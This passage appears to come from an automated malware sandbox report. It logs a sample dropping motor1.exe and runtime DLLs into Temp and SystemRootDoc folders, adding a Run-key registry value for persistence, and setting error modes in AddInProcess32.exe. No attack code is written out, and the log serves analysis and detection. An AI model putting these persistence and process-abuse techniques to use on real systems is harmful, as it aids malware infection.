Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndException.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndString.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndCrashHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndVersion.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndString.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndNetworking.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndHash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndAppLocations.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndVersion.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndFilesystem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\motor1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1			Jump to behavior

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
